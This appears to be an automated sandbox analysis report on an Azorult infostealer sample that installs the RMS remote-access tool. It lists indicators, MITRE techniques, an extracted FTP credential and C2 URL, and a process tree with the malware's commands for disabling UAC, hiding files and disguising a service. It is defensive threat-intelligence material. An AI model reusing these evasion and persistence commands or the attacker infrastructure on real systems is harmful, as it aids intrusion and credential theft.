azorult | e446bd97230671b6e38682ec9f3da7527c18dbd555efc7f27a52d144cf54edcc

Analysis

max time kernel
147s
max time network
170s
platform
windows10_x64
resource
win10v20201028
submitted
18-11-2020 16:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LtHv0O2KZDK4M637.exe

Score

10^/10

azorult rms aspackv2 discovery evasion infostealer persistence rat spyware stealer trojan upx

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
109.248.203.81
Port:
21
Username:
alex
Password:
easypassword

Extracted

Family

azorult

http://195.245.112.115/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies visiblity of hidden/system files in Explorer 2 TTPs
evasion

Hidden Files and Directories
T1158

Modify Registry
T1112
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral28/files/0x000100000001abe0-49.dat	acprotect
behavioral28/files/0x000100000001abe1-50.dat	acprotect

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

ASPack v2.12-2.42 9 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral28/files/0x000200000001abdd-32.dat	aspack_v212_v242
behavioral28/files/0x000200000001abdd-33.dat	aspack_v212_v242
behavioral28/files/0x000200000001abdd-39.dat	aspack_v212_v242
behavioral28/files/0x000200000001abdd-41.dat	aspack_v212_v242
behavioral28/files/0x000200000001abdd-48.dat	aspack_v212_v242
behavioral28/files/0x000300000001a4f4-51.dat	aspack_v212_v242
behavioral28/files/0x000300000001a4f4-56.dat	aspack_v212_v242
behavioral28/files/0x000300000001a4f4-55.dat	aspack_v212_v242
behavioral28/files/0x000300000001a4f4-68.dat	aspack_v212_v242

Blocks application from running via registry modification
Adds application to list of disallowed applications.
evasion

Drops file in Drivers directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\drivers\conhost.exe	taskhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	LtHv0O2KZDK4M637.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File created	C:\Windows\SysWOW64\drivers\conhost.exe	taskhost.exe

Executes dropped EXE 18 IoCs

pid	Process
3032	wini.exe
3304	winit.exe
3028	sys.exe
3860	rutserv.exe
356	rutserv.exe
2616	rutserv.exe
420	rutserv.exe
2928	rfusclient.exe
760	rfusclient.exe
3464	rfusclient.exe
2180	cheat.exe
1968	taskhost.exe
3356	taskhostw.exe
820	R8.exe
3160	winlogon.exe
3848	Rar.exe
4756	RDPWInst.exe
4672	RDPWInst.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral28/files/0x000100000001abe0-49.dat	upx
behavioral28/files/0x000100000001abe1-50.dat	upx
behavioral28/files/0x000200000001abec-98.dat	upx
behavioral28/files/0x000200000001abec-99.dat	upx

Loads dropped DLL 7 IoCs

pid	Process
3028	sys.exe
3028	sys.exe
3028	sys.exe
3028	sys.exe
3028	sys.exe
3028	sys.exe
5460	svchost.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5976	icacls.exe
5744	icacls.exe
6136	icacls.exe
5768	icacls.exe
4508	icacls.exe
5520	icacls.exe
5260	icacls.exe
5572	icacls.exe
5824	icacls.exe
5816	icacls.exe
5140	icacls.exe
2860	icacls.exe
1704	icacls.exe
5968	icacls.exe
5668	icacls.exe
5736	icacls.exe
5328	icacls.exe
5584	icacls.exe
5188	icacls.exe
5588	icacls.exe
2132	icacls.exe
5544	icacls.exe
5628	icacls.exe
5492	icacls.exe
4464	icacls.exe
5148	icacls.exe
4336	icacls.exe
5924	icacls.exe
2832	icacls.exe
2192	icacls.exe
5500	icacls.exe
5996	icacls.exe
3824	icacls.exe
6024	icacls.exe
400	icacls.exe
4004	icacls.exe
396	icacls.exe
4620	icacls.exe
5932	icacls.exe
1616	icacls.exe
5216	icacls.exe
4516	icacls.exe
4100	icacls.exe
5200	icacls.exe
5680	icacls.exe
5812	icacls.exe
744	icacls.exe
5152	icacls.exe
2356	icacls.exe
5796	icacls.exe
5472	icacls.exe
4112	icacls.exe
5528	icacls.exe
6060	icacls.exe
5396	icacls.exe
2176	icacls.exe
1560	icacls.exe
5576	icacls.exe
6020	icacls.exe
5904	icacls.exe
1312	icacls.exe
5832	icacls.exe
6064	icacls.exe
5720	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	LtHv0O2KZDK4M637.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	LtHv0O2KZDK4M637.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	taskhostw.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	LtHv0O2KZDK4M637.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
10	ip-api.com

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	LtHv0O2KZDK4M637.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	LtHv0O2KZDK4M637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	LtHv0O2KZDK4M637.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	LtHv0O2KZDK4M637.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	LtHv0O2KZDK4M637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	LtHv0O2KZDK4M637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Drops file in Program Files directory 31 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\360\Total Security	attrib.exe
File opened for modification	C:\Program Files\Malwarebytes\Anti-Malware	attrib.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	taskhost.exe
File opened for modification	C:\Program Files\AVAST Software\Avast	attrib.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	taskhost.exe
File opened for modification	C:\Program Files\ByteFence	taskhost.exe
File opened for modification	C:\Program Files\Malwarebytes	taskhost.exe
File opened for modification	C:\Program Files\COMODO	taskhost.exe
File opened for modification	C:\Program Files\Enigma Software Group	taskhost.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	taskhost.exe
File opened for modification	C:\Program Files\ESET	taskhost.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	taskhost.exe
File created	C:\Program Files\Common Files\System\iexplore.exe	taskhost.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	taskhost.exe
File opened for modification	C:\Program Files\Kaspersky Lab	taskhost.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File opened for modification	C:\Program Files\AVG	taskhost.exe
File opened for modification	C:\Program Files (x86)\AVG	taskhost.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files (x86)\Cezurity	taskhost.exe
File opened for modification	C:\Program Files\Cezurity	taskhost.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File opened for modification	C:\Program Files (x86)\Zaxar	taskhost.exe
File opened for modification	C:\Program Files (x86)\360	taskhost.exe
File opened for modification	C:\Program Files\AVAST Software	taskhost.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	taskhost.exe
File opened for modification	C:\Program Files\ESET	attrib.exe
File opened for modification	C:\Program Files\SpyHunter	taskhost.exe
File opened for modification	C:\Program Files (x86)\Panda Security	taskhost.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\boy.exe	taskhost.exe
File created	C:\Windows\svchost.exe	taskhost.exe
File opened for modification	C:\Windows\svchost.exe	taskhost.exe
File opened for modification	C:\Windows\NetworkDistribution	taskhost.exe
File created	C:\Windows\java.exe	taskhost.exe
File opened for modification	C:\Windows\java.exe	taskhost.exe
File opened for modification	C:\WINDOWS\McMwt	attrib.exe
File created	C:\Windows\boy.exe	taskhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	sys.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	sys.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe

Delays execution with timeout.exe 9 IoCs

evasion

pid	Process
1028	timeout.exe
4840	timeout.exe
5728	timeout.exe
4156	timeout.exe
1120	timeout.exe
5248	timeout.exe
2208	timeout.exe
2408	timeout.exe
2148	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
4392	ipconfig.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
1932	taskkill.exe
1504	taskkill.exe
5240	taskkill.exe
5060	taskkill.exe
2036	taskkill.exe
3412	taskkill.exe

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	cmd.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	LtHv0O2KZDK4M637.exe

Runs .reg file with regedit 2 IoCs

pid	Process
1836	regedit.exe
3548	regedit.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe
644	LtHv0O2KZDK4M637.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3356	taskhostw.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
624	Process not Found
624	Process not Found

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
3464	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3860	rutserv.exe
Token: SeDebugPrivilege	2616	rutserv.exe
Token: SeTakeOwnershipPrivilege	420	rutserv.exe
Token: SeTcbPrivilege	420	rutserv.exe
Token: SeTcbPrivilege	420	rutserv.exe
Token: SeDebugPrivilege	644	LtHv0O2KZDK4M637.exe
Token: 9799907557102771160	644	LtHv0O2KZDK4M637.exe
Token: 9800291286595393505	644	LtHv0O2KZDK4M637.exe
Token: 9800335267068368489	644	LtHv0O2KZDK4M637.exe
Token: 9800336366579799654	644	LtHv0O2KZDK4M637.exe
Token: 9800337466091755107	644	LtHv0O2KZDK4M637.exe
Token: 9800347361702499976	644	LtHv0O2KZDK4M637.exe
Token: 9800348461214455429	644	LtHv0O2KZDK4M637.exe
Token: 9800380347052775150	644	LtHv0O2KZDK4M637.exe
Token: 9800381446564730603	644	LtHv0O2KZDK4M637.exe
Token: 9800401237777830165	644	LtHv0O2KZDK4M637.exe
Token: 9800414431923917105	644	LtHv0O2KZDK4M637.exe
Token: 9800452914833445288	644	LtHv0O2KZDK4M637.exe
Token: 9800535378224337031	644	LtHv0O2KZDK4M637.exe
Token: 9800543074802782354	644	LtHv0O2KZDK4M637.exe
Token: 9800558467972780232	644	LtHv0O2KZDK4M637.exe
Token: 9800559567484735685	644	LtHv0O2KZDK4M637.exe
Token: 9800569463086567658	644	LtHv0O2KZDK4M637.exe
Token: 9800688210497819174	644	LtHv0O2KZDK4M637.exe
Token: 9800692608549311034	644	LtHv0O2KZDK4M637.exe
Token: 9800699205620519496	644	LtHv0O2KZDK4M637.exe
Token: 9800714598781604478	644	LtHv0O2KZDK4M637.exe
Token: 9800729991947408020	644	LtHv0O2KZDK4M637.exe
Token: 9800738788046197436	644	LtHv0O2KZDK4M637.exe
Token: 9800749783164179166	644	LtHv0O2KZDK4M637.exe
Token: 9800765176329982708	644	LtHv0O2KZDK4M637.exe
Token: 9800769574377278728	644	LtHv0O2KZDK4M637.exe
Token: 9800770673889234181	644	LtHv0O2KZDK4M637.exe
Token: 9800771773400665346	644	LtHv0O2KZDK4M637.exe
Token: 9800775071932337433	644	LtHv0O2KZDK4M637.exe
Token: 9800780569491066154	644	LtHv0O2KZDK4M637.exe
Token: 9800809156802956668	644	LtHv0O2KZDK4M637.exe
Token: 9800810256314912121	644	LtHv0O2KZDK4M637.exe
Token: 9800820151920938398	644	LtHv0O2KZDK4M637.exe
Token: 9800831147035250080	644	LtHv0O2KZDK4M637.exe
Token: 9800832246551399869	644	LtHv0O2KZDK4M637.exe
Token: 9800848739224440272	644	LtHv0O2KZDK4M637.exe
Token: 9800857535323229688	644	LtHv0O2KZDK4M637.exe
Token: 9800861933370526732	644	LtHv0O2KZDK4M637.exe
Token: 9800872928484314158	644	LtHv0O2KZDK4M637.exe
Token: 9800885023118969933	644	LtHv0O2KZDK4M637.exe
Token: 9800891620185459803	644	LtHv0O2KZDK4M637.exe
Token: 9800909212378844299	644	LtHv0O2KZDK4M637.exe
Token: 9800923506028498084	644	LtHv0O2KZDK4M637.exe
Token: 9800927904079989944	644	LtHv0O2KZDK4M637.exe
Token: 9800935600662629571	644	LtHv0O2KZDK4M637.exe
Token: 9800943297241074926	644	LtHv0O2KZDK4M637.exe
Token: 9800996073674428286	644	LtHv0O2KZDK4M637.exe
Token: 9800999372214488949	644	LtHv0O2KZDK4M637.exe
Token: 9801020262939021244	644	LtHv0O2KZDK4M637.exe
Token: 9801038954635972585	644	LtHv0O2KZDK4M637.exe
Token: 9801040054147403750	644	LtHv0O2KZDK4M637.exe
Token: 9801059845360504336	644	LtHv0O2KZDK4M637.exe
Token: 9801062044383890986	644	LtHv0O2KZDK4M637.exe
Token: 9801073039506591308	644	LtHv0O2KZDK4M637.exe
Token: 81688264704	644	LtHv0O2KZDK4M637.exe
Token: 0	644	LtHv0O2KZDK4M637.exe
Token: 274877907072	644	LtHv0O2KZDK4M637.exe
Token: 0	644	LtHv0O2KZDK4M637.exe

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
3304	winit.exe
3860	rutserv.exe
356	rutserv.exe
2616	rutserv.exe
420	rutserv.exe
3928	WinMail.exe
3312	WinMail.exe
1968	taskhost.exe
3356	taskhostw.exe
820	R8.exe
3160	winlogon.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 644 wrote to memory of 3032	644	LtHv0O2KZDK4M637.exe	75
PID 644 wrote to memory of 3032	644	LtHv0O2KZDK4M637.exe	75
PID 644 wrote to memory of 3032	644	LtHv0O2KZDK4M637.exe	75
PID 3032 wrote to memory of 1524	3032	wini.exe	76
PID 3032 wrote to memory of 1524	3032	wini.exe	76
PID 3032 wrote to memory of 1524	3032	wini.exe	76
PID 3032 wrote to memory of 3304	3032	wini.exe	77
PID 3032 wrote to memory of 3304	3032	wini.exe	77
PID 3032 wrote to memory of 3304	3032	wini.exe	77
PID 1524 wrote to memory of 1528	1524	WScript.exe	79
PID 1524 wrote to memory of 1528	1524	WScript.exe	79
PID 1524 wrote to memory of 1528	1524	WScript.exe	79
PID 1528 wrote to memory of 1836	1528	cmd.exe	81
PID 1528 wrote to memory of 1836	1528	cmd.exe	81
PID 1528 wrote to memory of 1836	1528	cmd.exe	81
PID 1528 wrote to memory of 3548	1528	cmd.exe	82
PID 1528 wrote to memory of 3548	1528	cmd.exe	82
PID 1528 wrote to memory of 3548	1528	cmd.exe	82
PID 1528 wrote to memory of 2208	1528	cmd.exe	83
PID 1528 wrote to memory of 2208	1528	cmd.exe	83
PID 1528 wrote to memory of 2208	1528	cmd.exe	83
PID 644 wrote to memory of 3028	644	LtHv0O2KZDK4M637.exe	86
PID 644 wrote to memory of 3028	644	LtHv0O2KZDK4M637.exe	86
PID 644 wrote to memory of 3028	644	LtHv0O2KZDK4M637.exe	86
PID 1528 wrote to memory of 3860	1528	cmd.exe	87
PID 1528 wrote to memory of 3860	1528	cmd.exe	87
PID 1528 wrote to memory of 3860	1528	cmd.exe	87
PID 1528 wrote to memory of 356	1528	cmd.exe	88
PID 1528 wrote to memory of 356	1528	cmd.exe	88
PID 1528 wrote to memory of 356	1528	cmd.exe	88
PID 1528 wrote to memory of 2616	1528	cmd.exe	89
PID 1528 wrote to memory of 2616	1528	cmd.exe	89
PID 1528 wrote to memory of 2616	1528	cmd.exe	89
PID 420 wrote to memory of 760	420	rutserv.exe	91
PID 420 wrote to memory of 760	420	rutserv.exe	91
PID 420 wrote to memory of 760	420	rutserv.exe	91
PID 420 wrote to memory of 2928	420	rutserv.exe	92
PID 420 wrote to memory of 2928	420	rutserv.exe	92
PID 420 wrote to memory of 2928	420	rutserv.exe	92
PID 1528 wrote to memory of 4032	1528	cmd.exe	93
PID 1528 wrote to memory of 4032	1528	cmd.exe	93
PID 1528 wrote to memory of 4032	1528	cmd.exe	93
PID 1528 wrote to memory of 2164	1528	cmd.exe	94
PID 1528 wrote to memory of 2164	1528	cmd.exe	94
PID 1528 wrote to memory of 2164	1528	cmd.exe	94
PID 1528 wrote to memory of 3916	1528	cmd.exe	95
PID 1528 wrote to memory of 3916	1528	cmd.exe	95
PID 1528 wrote to memory of 3916	1528	cmd.exe	95
PID 1528 wrote to memory of 2240	1528	cmd.exe	96
PID 1528 wrote to memory of 2240	1528	cmd.exe	96
PID 1528 wrote to memory of 2240	1528	cmd.exe	96
PID 1528 wrote to memory of 1544	1528	cmd.exe	97
PID 1528 wrote to memory of 1544	1528	cmd.exe	97
PID 1528 wrote to memory of 1544	1528	cmd.exe	97
PID 3028 wrote to memory of 3124	3028	sys.exe	99
PID 3028 wrote to memory of 3124	3028	sys.exe	99
PID 3028 wrote to memory of 3124	3028	sys.exe	99
PID 3124 wrote to memory of 1028	3124	cmd.exe	101
PID 3124 wrote to memory of 1028	3124	cmd.exe	101
PID 3124 wrote to memory of 1028	3124	cmd.exe	101
PID 3304 wrote to memory of 3928	3304	winit.exe	102
PID 3304 wrote to memory of 3928	3304	winit.exe	102
PID 3304 wrote to memory of 3928	3304	winit.exe	102
PID 3928 wrote to memory of 3312	3928	WinMail.exe	103

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	LtHv0O2KZDK4M637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	LtHv0O2KZDK4M637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	LtHv0O2KZDK4M637.exe

Views/modifies file attributes 1 TTPs 31 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
2404	attrib.exe
5992	attrib.exe
5972	attrib.exe
5204	attrib.exe
5164	attrib.exe
5696	attrib.exe
5236	attrib.exe
3540	attrib.exe
6068	attrib.exe
5644	attrib.exe
6028	attrib.exe
5784	attrib.exe
1816	attrib.exe
1444	attrib.exe
4164	attrib.exe
4032	attrib.exe
5360	attrib.exe
5448	attrib.exe
5648	attrib.exe
5368	attrib.exe
5304	attrib.exe
2164	attrib.exe
4600	attrib.exe
4160	attrib.exe
4008	attrib.exe
5440	attrib.exe
3792	attrib.exe
5548	attrib.exe
4276	attrib.exe
5284	attrib.exe
4968	attrib.exe

C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe
"C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Checks whether UAC is enabled
- Modifies WinLogon
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:644
- C:\ProgramData\Microsoft\Intel\wini.exe
  C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3032
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1524
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1528
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:1836
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:3548
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:2208
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3860
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:356
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2616
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        5⤵
        Views/modifies file attributes
        
        PID:4032
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:2164
    - - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        5⤵
        
        PID:3916
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        5⤵
        
        PID:2240
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        5⤵
        
        PID:1544
- - C:\ProgramData\Windows\winit.exe
    "C:\ProgramData\Windows\winit.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3304
  - - C:\Program Files (x86)\Windows Mail\WinMail.exe
      "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
      4⤵
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3928
    - - C:\Program Files\Windows Mail\WinMail.exe
        
        "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3312
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
      4⤵
      PID:756
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        5⤵
